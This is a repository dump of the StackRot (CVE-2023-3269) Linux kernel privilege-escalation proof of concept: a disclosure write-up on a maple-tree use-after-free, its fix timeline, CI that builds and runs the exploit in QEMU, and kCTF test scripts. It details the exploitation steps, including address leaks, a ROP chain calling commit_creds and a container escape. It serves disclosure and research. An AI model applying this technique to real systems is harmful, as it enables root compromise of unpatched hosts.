├── .github └── workflows │ └── ci.yml ├── README.md ├── env ├── .gitignore ├── README.md ├── bzImage_upstream_6.1.25 ├── bzImage_upstream_6.1.25_config ├── exp │ ├── as_root.sh │ └── exploit.sh └── initramfs.cpio.gz ├── exp ├── .clang-format ├── Makefile ├── README.md ├── consts │ ├── log.h │ ├── msg.h │ ├── paging.h │ ├── prog_regions.h │ └── stack.h ├── linkscript.lds ├── nolibc │ ├── Makefile │ ├── arch-aarch64.h │ ├── arch-arm.h │ ├── arch-i386.h │ ├── arch-mips.h │ ├── arch-riscv.h │ ├── arch-x86_64.h │ ├── arch.h │ ├── ctype.h │ ├── errno.h │ ├── nolibc.h │ ├── signal.h │ ├── std.h │ ├── stdio.h │ ├── stdlib.h │ ├── string.h │ ├── sys.h │ ├── time.h │ ├── types.h │ └── unistd.h ├── src │ ├── main.c │ ├── node_free.c │ ├── node_master.c │ ├── node_use.c │ ├── nodes_decl.h │ ├── nodes_free_and_use.h │ ├── nodes_master_and_free.h │ ├── nodes_master_and_use.h │ └── nodes_master_free_use.h ├── sys │ ├── msg.h │ └── uio.h ├── sysutil │ ├── clone.h │ ├── mbarrier.h │ └── pin_cpu.h └── utils │ └── string.h └── pic ├── node_master_code_leak.png ├── node_master_fengshui.png ├── node_master_heap_leak.png ├── node_master_kern_exec.png └── nodes_free_and_use.png /.github/workflows/ci.yml: -------------------------------------------------------------------------------- 1 | name: CI 2 | on: 3 | push: 4 | branches: 5 | - master 6 | pull_request: 7 | branches: 8 | - master 9 | jobs: 10 | ci: 11 | runs-on: ubuntu-latest 12 | defaults: 13 | run: 14 | working-directory: ./exp 15 | steps: 16 | - name: Checkout the repository 17 | uses: actions/checkout@v3 18 | - name: Check the code format 19 | run: make check 20 | - name: Build the exploit 21 | run: make 22 | - name: Install QEMU 23 | run: sudo apt-get install -y qemu-system-x86-64 24 | - name: Run the exploit 25 | id: test 26 | continue-on-error: true 27 | run: make run KVM= 28 | - name: Retry to run the exploit 29 | if: steps.test.outcome == 'failure' 30 | run: make run KVM= 31 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # StackRot (CVE-2023-3269): Linux kernel privilege escalation vulnerability 2 | 3 | [![GitHub CI](https://github.com/lrh2000/StackRot/actions/workflows/ci.yml/badge.svg)][ci] 4 | [*(GitHub-CI-verified exploit)*][ci] 5 | 6 | [ci]: https://github.com/lrh2000/StackRot/actions 7 | 8 | A flaw was found in the handling of stack expansion in the Linux kernel 6.1 9 | through 6.4, aka "Stack Rot". The maple tree, responsible for managing virtual 10 | memory areas, can undergo node replacement without properly acquiring the MM 11 | write lock, leading to use-after-free issues. An unprivileged local user could 12 | use this flaw to compromise the kernel and escalate their privileges. 13 | 14 | As StackRot is a Linux kernel vulnerability found in the memory management 15 | subsystem, it affects almost all kernel configurations and requires minimal 16 | capabilities to trigger. However, it should be noted that maple nodes are freed 17 | using RCU callbacks, delaying the actual memory deallocation until after the 18 | RCU grace period. Consequently, exploiting this vulnerability is considered 19 | challenging. 20 | 21 | To the best of my knowledge, there are currently no publicly available exploits 22 | targeting use-after-free-by-RCU (UAFBR) bugs. This marks the first instance 23 | where UAFBR bugs have been proven to be exploitable, even without the presence 24 | of CONFIG_PREEMPT or CONFIG_SLAB_MERGE_DEFAULT settings. Notably, this exploit 25 | has been successfully demonstrated in the environment provided by [Google kCTF 26 | VRP][ctf] ([bzImage_upstream_6.1.25][img], [config][cfg]). 27 | 28 | [ctf]: https://google.github.io/kctf/vrp.html 29 | [img]: https://storage.googleapis.com/kctf-vrp-public-files/bzImage_upstream_6.1.25 30 | [cfg]: https://storage.googleapis.com/kctf-vrp-public-files/bzImage_upstream_6.1.25_config 31 | 32 | The StackRot vulnerability has been present in the Linux kernel since version 33 | 6.1 when the VMA tree structure was [changed][ch] from red-black trees to maple 34 | trees. 35 | 36 | [ch]: https://lore.kernel.org/lkml/20220906194824.2110408-1-Liam.Howlett@oracle.com/ 37 | 38 | ## Background 39 | 40 | Whenever the `mmap()` system call is utilized to establish a memory mapping, 41 | the kernel generates a structure called `vm_area_struct` to represent the 42 | corresponding virtual memory area (VMA). This structure stores various 43 | information including flags, properties, and other pertinent details related to 44 | the mapping. 45 | 46 | ```c 47 | struct vm_area_struct { 48 | long unsigned int vm_start; /* 0 8 */ 49 | long unsigned int vm_end; /* 8 8 */ 50 | struct mm_struct * vm_mm; /* 16 8 */ 51 | pgprot_t vm_page_prot; /* 24 8 */ 52 | long unsigned int vm_flags; /* 32 8 */ 53 | union { 54 | struct { 55 | struct rb_node rb __attribute__((__aligned__(8))); /* 40 24 */ 56 | /* --- cacheline 1 boundary (64 bytes) --- */ 57 | long unsigned int rb_subtree_last; /* 64 8 */ 58 | } __attribute__((__aligned__(8))) shared __attribute__((__aligned__(8))); /* 40 32 */ 59 | struct anon_vma_name * anon_name; /* 40 8 */ 60 | } __attribute__((__aligned__(8))); /* 40 32 */ 61 | /* --- cacheline 1 boundary (64 bytes) was 8 bytes ago --- */ 62 | struct list_head anon_vma_chain; /* 72 16 */ 63 | struct anon_vma * anon_vma; /* 88 8 */ 64 | const struct vm_operations_struct * vm_ops; /* 96 8 */ 65 | long unsigned int vm_pgoff; /* 104 8 */ 66 | struct file * vm_file; /* 112 8 */ 67 | void * vm_private_data; /* 120 8 */ 68 | /* --- cacheline 2 boundary (128 bytes) --- */ 69 | atomic_long_t swap_readahead_info; /* 128 8 */ 70 | struct vm_userfaultfd_ctx vm_userfaultfd_ctx; /* 136 0 */ 71 | 72 | /* size: 136, cachelines: 3, members: 14 */ 73 | /* forced alignments: 1 */ 74 | /* last cacheline: 8 bytes */ 75 | } __attribute__((__aligned__(8))); 76 | ``` 77 | 78 | Subsequently, when the kernel encounters page faults or other memory-related 79 | system calls, it requires fast lookup of the VMA solely based on the address. 80 | Previously, the VMAs were managed using red-black trees. However, starting from 81 | Linux kernel version 6.1, the migration to maple trees took place. [Maple 82 | trees][mt] are RCU-safe B-tree data structures optimized for storing 83 | non-overlapping ranges. Nonetheless, their intricate nature adds complexity to 84 | the codebase and introduces the StackRot vulnerability. 85 | 86 | [mt]: https://docs.kernel.org/6.4/core-api/maple_tree.html 87 | 88 | At its core, a maple tree is made up of maple nodes. While the tree's structure 89 | may be complex, it's important to note that this complexity has nothing to do 90 | with the StackRot bug. Therefore, throughout this article, it is assmued that 91 | the maple tree consists of only one node, i.e., the root node. 92 | 93 | This root node can contain up to 16 intervals. These intervals may either 94 | represent a gap or point to a VMA. As gaps also count as intervals, all 95 | intervals are connected sequentially, resulting in the need for only 15 96 | endpoints, also known as pivots, within the node's structure. Note that the 97 | leftmost endpoint and the rightmost endpoint are omitted, as they can be 98 | retrieved from the parent node. 99 | 100 | ```c 101 | struct maple_range_64 { 102 | struct maple_pnode * parent; /* 0 8 */ 103 | long unsigned int pivot[15]; /* 8 120 */ 104 | /* --- cacheline 2 boundary (128 bytes) --- */ 105 | union { 106 | void * slot[16]; /* 128 128 */ 107 | struct { 108 | void * pad[15]; /* 128 120 */ 109 | /* --- cacheline 3 boundary (192 bytes) was 56 bytes ago --- */ 110 | struct maple_metadata meta; /* 248 2 */ 111 | }; /* 128 128 */ 112 | }; /* 128 128 */ 113 | 114 | /* size: 256, cachelines: 4, members: 3 */ 115 | }; 116 | ``` 117 | 118 | The `maple_range_64` structure, as shown above, represents a maple node. In 119 | addition to the pivots, the slots are used to refer to the VMA structure when 120 | the node functions as a leaf node, or to other maple nodes when the node 121 | functions as an interior node. If an interval corresponds to a gap, the slot 122 | will simply contain a NULL value. The arrangement of pivot points and slots can 123 | be visualized as illustrated below: 124 | 125 | ``` 126 | Slots -> | 0 | 1 | 2 | ... | 12 | 13 | 14 | 15 | 127 | ┬ ┬ ┬ ┬ ┬ ┬ ┬ ┬ ┬ 128 | │ │ │ │ │ │ │ │ └─ Implied maximum 129 | │ │ │ │ │ │ │ └─ Pivot 14 130 | │ │ │ │ │ │ └─ Pivot 13 131 | │ │ │ │ │ └─ Pivot 12 132 | │ │ │ │ └─ Pivot 11 133 | │ │ │ └─ Pivot 2 134 | │ │ └─ Pivot 1 135 | │ └─ Pivot 0 136 | └─ Implied minimum 137 | ``` 138 | 139 | Regarding concurrent modification, the maple tree imposes a specific 140 | restriction, that is, an exclusive lock must be held by writers (*Rule W*). In 141 | the case of the VMA tree, the exclusive lock corresponds to the MM write lock. 142 | As for readers, two options are available. The first option involves holding 143 | the MM read lock (*Rule A1*), which results in the writer being blocked by the 144 | MM read-write lock. Alternatively, the second option is to enter the RCU 145 | critical section (*Rule A2*). By doing so, the writer is not blocked, and 146 | readers can continue their operations since the maple tree is RCU-safe. While 147 | most existing VMA accesses opt for the first option (i.e., Rule A1), Rule A2 is 148 | employed in a few performance-critical scenarios, such as lockless page faults. 149 | 150 | However, there is an additional aspect that requires particular attention, 151 | which pertains to stack expansion. The stack represents a memory area that is 152 | mapped with the MAP_GROWSDOWN flag, indicating automatic expansion when an 153 | address below the region is accessed. In such cases, the start address of the 154 | corresponding VMA is adjusted, as well as the associated interval within the 155 | maple tree. Notably, these adjustments are made without holding the MM write 156 | lock. 157 | 158 | ```c 159 | static inline 160 | void do_user_addr_fault(struct pt_regs *regs, 161 | unsigned long error_code, 162 | unsigned long address) 163 | { 164 | // ... 165 | 166 | if (unlikely(!mmap_read_trylock(mm))) { 167 | // ... 168 | } 169 | // ... 170 | if (unlikely(expand_stack(vma, address))) { 171 | // ... 172 | } 173 | 174 | // ... 175 | } 176 | ``` 177 | 178 | Typically, a gap exists between the stack VMA and its neighboring VMA, as the 179 | kernel enforces a stack guard. In this scenario, when expanding the stack, only 180 | the pivot value in the maple node needs updating, a process that can be 181 | performed atomically. However, if the neighboring VMA also possesses the 182 | MAP_GROWSDOWN flag, no stack guard is enforced. 183 | 184 | ```c 185 | int expand_downwards(struct vm_area_struct *vma, unsigned long address) 186 | { 187 | // ... 188 | 189 | if (prev) { 190 | if (!(prev->vm_flags & VM_GROWSDOWN) && 191 | vma_is_accessible(prev) && 192 | (address - prev->vm_end < stack_guard_gap)) 193 | return -ENOMEM; 194 | } 195 | 196 | // ... 197 | } 198 | ``` 199 | 200 | As a result, the stack expansion can eliminate the gap. In such situations, the 201 | gap interval within the maple node must be removed. As the maple tree is 202 | RCU-safe, overwriting the node in-place is not possible. Instead, a new node is 203 | created, triggering node replacement, and the old node is subsequently 204 | destroyed using an RCU callback. 205 | 206 | ```c 207 | static inline void mas_wr_modify(struct ma_wr_state *wr_mas) 208 | { 209 | // ... 210 | 211 | if ((wr_mas->offset_end - mas->offset <= 1) && 212 | mas_wr_slot_store(wr_mas)) // <-- in-place update 213 | return; 214 | else if (mas_wr_node_store(wr_mas)) // <-- node replacement 215 | return; 216 | 217 | // ... 218 | } 219 | ``` 220 | 221 | The RCU callback is invoked only after all pre-existing RCU critical sections 222 | have concluded. However, the issue arises when accessing VMAs, as only the MM 223 | read lock is held, and it does not enter the RCU critical section (according to 224 | Rule A1). Consequently, in theory, the callback could be invoked at any time, 225 | resulting in the freeing of the old maple node. However, pointers to the old 226 | node may have already been fetched, leading to a use-after-free bug when 227 | attempting subsequent access to it. 228 | 229 | The backtrace where use-after-free (UAF) occurs is shown below: 230 | 231 | ``` 232 | - CPU 0 - - CPU 1 - 233 | 234 | mm_read_lock() mm_read_lock() 235 | expand_stack() find_vma_prev() 236 | expand_downwards() mas_walk() 237 | mas_store_prealloc() mas_state_walk() 238 | mas_wr_story_entry() mas_start() 239 | mas_wr_modify() mas_root() 240 | mas_wr_node_store() node = rcu_dereference_check() 241 | mas_replace() [ The node pointer is recorded ] 242 | mas_free() 243 | ma_free_rcu() 244 | call_rcu(&mt_free_rcu) 245 | [ The node is dead ] 246 | mm_read_unlock() 247 | 248 | [ Wait for the next RCU grace period.. ] 249 | rcu_do_batch() mas_prev() 250 | mt_free_rcu() mas_prev_entry() 251 | kmem_cache_free() mas_prev_nentry() 252 | [ The node is freed ] mas_slot() 253 | mt_slot() 254 | rcu_dereference_check(node->..) 255 | [ UAF occurs here ] 256 | mm_read_unlock() 257 | ``` 258 | 259 | ## Fix 260 | 261 | I reported this vulnerability to the Linux kernel security team on June 15th. 262 | Following that, the process of addressing this bug was led by Linus Torvalds. 263 | Given its complexity, it took nearly two weeks to develop a set of patches that 264 | received consensus. 265 | 266 | On June 28th, during the merge window for Linux kernel 6.5, the fix was merged 267 | into Linus' tree. Linus provided a [comprehensive merge message][fix] to 268 | elucidate the patch series from a technical perspective. 269 | 270 | [fix]: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9471f1f2f50282b9e8f59198ec6bb738b4ccc009 271 | 272 | These patches were subsequently backported to stable kernels ([6.1.37][6.1], 273 | [6.3.11][6.3], and [6.4.1][6.4]), effectively resolving the "Stack Rot" bug on 274 | July 1st. 275 | 276 | [6.1]: https://lore.kernel.org/stable/2023070133-create-stainless-9a8c@gregkh/T/ 277 | [6.3]: https://lore.kernel.org/stable/2023070146-endearing-bounding-d21a@gregkh/T/ 278 | [6.4]: https://lore.kernel.org/stable/2023070140-eldercare-landlord-133c@gregkh/T/ 279 | 280 | ## Exploit 281 | 282 | The exploit primarily focuses on the Google kCTF challenge, specifically when 283 | neither CONFIG_PREEMPT nor CONFIG_SLAB_MERGE_DEFAULT is set. To exploit 284 | StackRot, the most important task is to locate a VMA iteration that fulfills 285 | the following criteria: 286 | 1. The iteration's timing can be controlled. This control allows us to ensure 287 | that the RCU grace period concludes during the VMA iteration. 288 | 2. The iteration retrieves specific information from the VMA structure, and 289 | returns the information to the userspace. This feature enables us to 290 | exploit the UAF vulnerability of the maple node to leak some kernel 291 | addresses. 292 | 3. The iteration invokes certain function pointers in the VMA structure. This 293 | particular capability allows us to exploit the UAF of the maple node to 294 | control the kernel-mode program counter (PC). 295 | 296 | The chosen VMA iteration is the iteration responsible for generating the 297 | contents of `/proc/[pid]/maps`. The following sections will show how this 298 | iteration satisfies the above criteria. 299 | 300 | ### Step 0: From UAFBR to UAF 301 | 302 | During any VMA iteration, the reference to the root node of the VMA tree is 303 | obtained, and the iteration proceeds through its slots. Thus, by triggering 304 | stack expansion in another thread on a separate CPU during the VMA iteration, 305 | the node replacement can be concurrently initiated. At this point, accessing 306 | the old node is considered a use-after-free-by-RCU (UAFBR) situation. However, 307 | actual issues arise only when the old node is truly freed, which occurs in the 308 | RCU callback. 309 | 310 | This presents two challenges: (i) determining when the old node is freed and 311 | (ii) ensuring that the VMA iteration does not complete before the old node is 312 | freed. 313 | 314 | The first question is relatively straightforward. In the kernel, the 315 | `synchronize_rcu()` function can be employed to wait until the RCU grace period 316 | concludes, ensuring that all pre-existing RCU callbacks have been invoked. In 317 | userspace, system calls that ultimately call `synchronize_rcu()` can be 318 | utilized for the same purpose. Thus, when such system calls terminate, it is 319 | known that the old node has been freed. Notably, there is a system call, 320 | `membarrier(MEMBARRIER_CMD_GLOBAL, 0, -1)`, that solely invokes 321 | `synchronize_rcu()`. 322 | 323 | ```c 324 | SYSCALL_DEFINE3(membarrier, int, cmd, unsigned int, flags, int, cpu_id) 325 | { 326 | // ... 327 | 328 | switch (cmd) { 329 | // ... 330 | case MEMBARRIER_CMD_GLOBAL: 331 | /* MEMBARRIER_CMD_GLOBAL is not compatible with nohz_full. */ 332 | if (tick_nohz_full_enabled()) 333 | return -EINVAL; 334 | if (num_online_cpus() > 1) 335 | synchronize_rcu(); 336 | return 0; 337 | // ... 338 | } 339 | } 340 | ``` 341 | 342 | The second question necessitates further consideration. Several potential 343 | solutions are as follows: 344 | 1. The iteration task gets preempted, the RCU grace period ends, and the 345 | iteration resumes execution. However, this approach is ineffective if 346 | CONFIG_PREEMPT is not set. 347 | 2. The iteration task enters a sleep state (e.g., waiting for I/O), the RCU 348 | grace period ends, and the iteration continues. Currently, I am unaware of 349 | any VMA iteration that satisfies this requirement and can be exploited to 350 | leak kernel addresses and control the program counter (PC). It may exist, 351 | but a thorough investigation is required. 352 | 3. The iteration task experiences an interruption (e.g., timer interrupt), 353 | during which the RCU grace period concludes. It is possible to employ 354 | timerfd to create multiple hardware timers that, upon timeout during the 355 | VMA iteration, can trigger a lengthy interrupt. However, this approach is 356 | not viable because the interrupt handler operates with interrupts disabled, 357 | and if a CPU cannot handle inter-processor interrupts (IPIs), the RCU grace 358 | period will not end. 359 | 4. The iteration task is deliberately prolonged, allowing the RCU grace period 360 | to expire. This is the chosen solution. If the current RCU grace period 361 | surpasses RCU_TASK_IPI_DELAY (defaulting to 0.5 seconds), inter-processor 362 | interrupts (IPIs) are dispatched to all CPUs to verify that they are not in 363 | RCU critical sections. In the case of VMA iteration, the answer is 364 | negative, signifying that the RCU grace period concludes and the maple node 365 | is freed, effectively converting UAFBR into a genuine use-after-free (UAF) 366 | scenario. 367 | 368 | One significant observation is that during VMA iteration for 369 | `/proc/[pid]/maps`, it generates the entire file path for file-mapped memory 370 | regions. Although the directory name is typically restricted to a maximum of 371 | 255 characters, there is no limitation on the directory depth. This means that 372 | by creating a file with an exceedingly large directory depth and establishing a 373 | memory mapping for this file, accessing `/proc/[pid]/maps` can take a 374 | considerable amount of time during the VMA iteration. Consequently, this 375 | extended duration enables the possibility of concluding the RCU grace period 376 | and acquiring the UAF primitive. 377 | 378 | ```c 379 | static void 380 | show_map_vma(struct seq_file *m, struct vm_area_struct *vma) 381 | { 382 | // ... 383 | 384 | /* 385 | * Print the dentry name for named mappings, and a 386 | * special [heap] marker for the heap: 387 | */ 388 | if (file) { 389 | seq_pad(m, ' '); 390 | /* 391 | * If user named this anon shared memory via 392 | * prctl(PR_SET_VMA ..., use the provided name. 393 | */ 394 | if (anon_name) 395 | seq_printf(m, "[anon_shmem:%s]", anon_name->name); 396 | else 397 | seq_file_path(m, file, "\n"); 398 | goto done; 399 | } 400 | 401 | // ... 402 | } 403 | ``` 404 | 405 | This step is illustrated in the following figure: 406 | 407 | ![Step 0: From UAFBR to UAF](pic/nodes_free_and_use.png) 408 | 409 | ### Step 1: From slab UAF to page UAF 410 | 411 | Now that UAF is functioning within a slab. If CONFIG_SLAB_MERGE_DEFAULT is 412 | enabled and the slab of maple nodes merges with kmalloc-256, the contents 413 | within the old node can be controlled by allocating a new structure from 414 | kmalloc-256 and populating it with userspace data. However, if 415 | CONFIG_SLAB_MERGE_DEFAULT is not set, an alternative approach is required. In 416 | this case, one needs to return the page of the freed node to the page 417 | allocator, allowing the old node to be controlled by allocating a new page and 418 | filling it accordingly. 419 | 420 | Recall that the VMA tree will only contain one node. Hence, by utilizing 421 | `fork()`/`clone()`, multiple VMA trees and an equal number of maple nodes are 422 | generated. Assuming one slab encompasses M maple nodes, and one node per M 423 | nodes is retained while all other nodes are freed via `exit()`, the remaining 424 | nodes become the sole nodes within their respective slabs. Initially, these 425 | slabs reside in the CPU's partial list. When the partial list reaches its 426 | capacity, the slabs are flushed back to the partial list of the corresponding 427 | NUMA node. 428 | 429 | If the last maple node within a slab is freed, the slab becomes empty. If this 430 | slab resides in the partial list of a NUMA node, and the partial list of that 431 | particular NUMA node is already at maximum capacity, the page is immediately 432 | returned to the page allocator. Consequently, the slab UAF transforms into a 433 | page UAF scenario. The contents within the freed page can be manipulated by 434 | sending some data via `msgsnd()`, which allocates elastic objects and directly 435 | populates them with the provided user data. 436 | 437 | ```c 438 | static void __slab_free(struct kmem_cache *s, struct slab *slab, 439 | void *head, void *tail, int cnt, 440 | unsigned long addr) 441 | 442 | { 443 | // ... 444 | 445 | if (unlikely(!new.inuse && n->nr_partial >= s->min_partial)) 446 | goto slab_empty; 447 | 448 | // ... 449 | return; 450 | 451 | slab_empty: 452 | // ... 453 | discard_slab(s, slab); 454 | } 455 | ``` 456 | 457 | The number of maple nodes per slab, M, depends on the number of CPUs. The 458 | exploit implementation considers a situation with two CPUs and therefore 459 | assumes 16 as the value of M, as illustrated in the following figure: 460 | 461 | ![Step 1: From slab UAF to page UAF](pic/node_master_fengshui.png) 462 | 463 | ### Step 2: From UAF to address leaking 464 | 465 | Upon gaining control of the maple node, it becomes possible to manipulate the 466 | addresses of subsequent VMAs that will be later iterated. As the targeted 467 | iteration is aimed at generating `/proc/self/maps`, certain VMA information, 468 | such as the start and end addresses, which reside within the VMA structure, are 469 | returned to the user space. 470 | 471 | However, a challenge arises: the address of a VMA structure in the maple node 472 | can only be appropriately set if some addresses are already known. Fortunately, 473 | CVE-2023-0597 directly serves this purpose. According to CVE-2023-0597, the 474 | address of `cpu_entry_area` is not randomized. Although this vulnerability has 475 | been patched in Linux 6.2, it has not been backported to earlier stable kernels 476 | as of the time of writing. Consequently, by overwriting the address of the VMA 477 | structure with that of the last IDT entry, the entry that contains the address 478 | of `asm_sysvec_spurious_apic_interrupt` is directly leaked, thereby revealing 479 | the base addresses of the kernel code and kernel data. 480 | 481 | ![Step 2: From UAF to address leaking (1)](pic/node_master_code_leak.png) 482 | 483 | The previously discussed method can be used recurrently to incrementally expose 484 | more addresses from the kernel data section. For instance, the 485 | `init_task.tasks.prev` pointer within the data section directs to the 486 | `task_struct` structure of the latest created task, which is without question 487 | allocated on the heap. 488 | 489 | ![Step 2: From UAF to address leaking (2)](pic/node_master_heap_leak.png) 490 | 491 | When all newly established tasks are terminated, their `task_struct` structures 492 | will subsequently be deallocated. If the quantity of these tasks is large 493 | enough, the corresponding pages can be surrendered back to the page allocator. 494 | This allows for the possibility to reallocate these pages and fill them with 495 | user data. However, keep in mind that the released pages generally belong to 496 | the per-cpu page (PCP) list. For pages present in the PCP list, they can be 497 | reallocated exclusively in the same page order. Consequently, solely mapping 498 | new pages into the user space, which requires only order-0 pages from the page 499 | allocator, won't fulfill the objectives. 500 | 501 | Nonetheless, the msgsnd system call will solicit memory chunks via kmalloc and 502 | populate these chunks with user-defined data. When the kmalloc cache is 503 | exhausted, it will requisition pages from the page allocator at a specific 504 | order. If the message size is accurately adjusted, the exact order will be 505 | desired. Thus, the page whose address has been previously leaked will be 506 | reallocated. As a result, it becomes possible to obtain a page with a known 507 | address and user-manipulated data. 508 | 509 | ### Step 3: From UAF to root privileges 510 | 511 | It is now possible to forge the VMA structure in the address-known page and 512 | control the `vma->vm_ops->name` function pointer. The next step involves 513 | finding suitable gadgets to escape containers and acquire root privileges. 514 | 515 | ```c 516 | static void 517 | show_map_vma(struct seq_file *m, struct vm_area_struct *vma) 518 | { 519 | // ... 520 | 521 | if (vma->vm_ops && vma->vm_ops->name) { 522 | name = vma->vm_ops->name(vma); 523 | if (name) 524 | goto done; 525 | } 526 | 527 | // ... 528 | } 529 | ``` 530 | 531 | ![Step 3: From UAF to root privileges](pic/node_master_kern_exec.png) 532 | 533 | The gadget constructions are as follows: 534 | 1. Stack pivot: `movq %rbx, %rsi; movq %rbp, %rdi; call 535 | __x86_indirect_thunk_r13` -> `pushq %rsi; jmp 46(%rsi)` -> `popq %rsp; ret` 536 | -> `popq %rsp; ret`, where %rdi, %rbx, and %r13 _initially_ points to 537 | user-controllable data. 538 | 2. Gain root privileges: `popq %rdi; ret` -> `prepare_kernel_cred` -> `popq 539 | %rdi; ret` -> `movq %rax, (%rdi); ret`, where %rdi _now_ points to the 540 | stack top; `popq %rdi; ret` -> `commit_creds`, effectively executing 541 | `commit_creds(prepare_kernel_cred(&init_task))`. 542 | 3. Escape containers: `popq %rdi; ret` -> `find_task_by_vpid` -> `popq %rdi; 543 | ret` -> `movq %rax, (%rdi); ret`, where %rdi _now_ points to the stack top; 544 | `popq %rdi; ret` -> `popq %rsi; ret` -> `switch_task_namespaces`, 545 | effectively performing `switch_task_namespaces(find_task_by_vpid(1), 546 | &init_nsproxy)`. 547 | 4. Unlock mm: `popq %rax; ret` -> `movq %rbp, %rdi; call 548 | __x86_indirect_thunk_rax`, where %rbp points to the original seq_file; 549 | `popq %rax; ret` -> `m_stop`, effectively executing `m_stop(seq_file, ..)`. 550 | 5. Return to userspace: use `swapgs_restore_regs_and_return_to_usermode`, and 551 | call `execve()` to get the shell. 552 | 553 | Finally, using `nsenter --mount=/proc/1/ns/mnt` to restore the mount namespace 554 | and get the flag via `cat /flag/flag`. 555 | 556 | ### Source code 557 | 558 | The full exploit source is available [here](/exp). For more details, refer to 559 | its README file. 560 | -------------------------------------------------------------------------------- /env/.gitignore: -------------------------------------------------------------------------------- 1 | exp/exploit 2 | run.out 3 | -------------------------------------------------------------------------------- /env/README.md: -------------------------------------------------------------------------------- 1 | # Linux kernel 6.1.25 2 | 3 | Here is the Linux kernel image and config used in the [Google kCTF VRP][ctf] 4 | challenge. 5 | 6 | [ctf]: https://google.github.io/kctf/vrp.html 7 | 8 | File information: 9 | - `bzImage_upstream_6.1.25` was downloaded from: 10 | - https://storage.googleapis.com/kctf-vrp-public-files/bzImage_upstream_6.1.25 11 | - `bzImage_upstream_6.1.25_config` was downloaded from: 12 | - https://storage.googleapis.com/kctf-vrp-public-files/bzImage_upstream_6.1.25_config 13 | - `initramfs.cpio.gz` was built from scratch because Google kCTF VRP does not 14 | provide the disk image it uses. 15 | -------------------------------------------------------------------------------- /env/bzImage_upstream_6.1.25: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lrh2000/StackRot/c50978a5730745f4fea1e02313242177a4f6bd9f/env/bzImage_upstream_6.1.25 -------------------------------------------------------------------------------- /env/exp/as_root.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | export PATH=/bin:/usr/bin:/sbin:$PATH 4 | 5 | set -v 6 | 7 | whoami 8 | 9 | ls -al /root 10 | cat /root/flag 11 | 12 | poweroff -f 13 | -------------------------------------------------------------------------------- /env/exp/exploit.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | set -v 4 | 5 | whoami 6 | 7 | ls -al /root 8 | cat /root/flag 9 | 10 | exec $(dirname $0)/exploit 11 | -------------------------------------------------------------------------------- /env/initramfs.cpio.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lrh2000/StackRot/c50978a5730745f4fea1e02313242177a4f6bd9f/env/initramfs.cpio.gz -------------------------------------------------------------------------------- /exp/.clang-format: -------------------------------------------------------------------------------- 1 | # SPDX-License-Identifier: GPL-2.0 2 | # 3 | # clang-format configuration file. Intended for clang-format >= 11. 4 | # 5 | # For more information, see: 6 | # 7 | # Documentation/process/clang-format.rst 8 | # https://clang.llvm.org/docs/ClangFormat.html 9 | # https://clang.llvm.org/docs/ClangFormatStyleOptions.html 10 | # 11 | --- 12 | AccessModifierOffset: -4 13 | AlignAfterOpenBracket: Align 14 | AlignConsecutiveAssignments: false 15 | AlignConsecutiveDeclarations: false 16 | AlignEscapedNewlines: Left 17 | AlignOperands: true 18 | AlignTrailingComments: false 19 | AllowAllParametersOfDeclarationOnNextLine: false 20 | AllowShortBlocksOnASingleLine: false 21 | AllowShortCaseLabelsOnASingleLine: false 22 | AllowShortFunctionsOnASingleLine: None 23 | AllowShortIfStatementsOnASingleLine: false 24 | AllowShortLoopsOnASingleLine: false 25 | AlwaysBreakAfterDefinitionReturnType: None 26 | AlwaysBreakAfterReturnType: None 27 | AlwaysBreakBeforeMultilineStrings: false 28 | AlwaysBreakTemplateDeclarations: false 29 | BinPackArguments: true 30 | BinPackParameters: true 31 | BraceWrapping: 32 | AfterClass: false 33 | AfterControlStatement: false 34 | AfterEnum: false 35 | AfterFunction: true 36 | AfterNamespace: true 37 | AfterObjCDeclaration: false 38 | AfterStruct: false 39 | AfterUnion: false 40 | AfterExternBlock: false 41 | BeforeCatch: false 42 | BeforeElse: false 43 | IndentBraces: false 44 | SplitEmptyFunction: true 45 | SplitEmptyRecord: true 46 | SplitEmptyNamespace: true 47 | BreakBeforeBinaryOperators: None 48 | BreakBeforeBraces: Custom 49 | BreakBeforeInheritanceComma: false 50 | BreakBeforeTernaryOperators: false 51 | BreakConstructorInitializersBeforeComma: false 52 | BreakConstructorInitializers: BeforeComma 53 | BreakAfterJavaFieldAnnotations: false 54 | BreakStringLiterals: false 55 | ColumnLimit: 80 56 | CommentPragmas: '^ IWYU pragma:' 57 | CompactNamespaces: false 58 | ConstructorInitializerAllOnOneLineOrOnePerLine: false 59 | ConstructorInitializerIndentWidth: 8 60 | ContinuationIndentWidth: 8 61 | Cpp11BracedListStyle: false 62 | DerivePointerAlignment: false 63 | DisableFormat: false 64 | ExperimentalAutoDetectBinPacking: false 65 | FixNamespaceComments: false 66 | 67 | # Taken from: 68 | # git grep -h '^#define [^[:space:]]*for_each[^[:space:]]*(' include/ tools/ \ 69 | # | sed "s,^#define \([^[:space:]]*for_each[^[:space:]]*\)(.*$, - '\1'," \ 70 | # | LC_ALL=C sort -u 71 | ForEachMacros: 72 | - '__ata_qc_for_each' 73 | - '__bio_for_each_bvec' 74 | - '__bio_for_each_segment' 75 | - '__evlist__for_each_entry' 76 | - '__evlist__for_each_entry_continue' 77 | - '__evlist__for_each_entry_from' 78 | - '__evlist__for_each_entry_reverse' 79 | - '__evlist__for_each_entry_safe' 80 | - '__for_each_mem_range' 81 | - '__for_each_mem_range_rev' 82 | - '__for_each_thread' 83 | - '__hlist_for_each_rcu' 84 | - '__map__for_each_symbol_by_name' 85 | - '__perf_evlist__for_each_entry' 86 | - '__perf_evlist__for_each_entry_reverse' 87 | - '__perf_evlist__for_each_entry_safe' 88 | - '__rq_for_each_bio' 89 | - '__shost_for_each_device' 90 | - 'apei_estatus_for_each_section' 91 | - 'ata_for_each_dev' 92 | - 'ata_for_each_link' 93 | - 'ata_qc_for_each' 94 | - 'ata_qc_for_each_raw' 95 | - 'ata_qc_for_each_with_internal' 96 | - 'ax25_for_each' 97 | - 'ax25_uid_for_each' 98 | - 'bio_for_each_bvec' 99 | - 'bio_for_each_bvec_all' 100 | - 'bio_for_each_folio_all' 101 | - 'bio_for_each_integrity_vec' 102 | - 'bio_for_each_segment' 103 | - 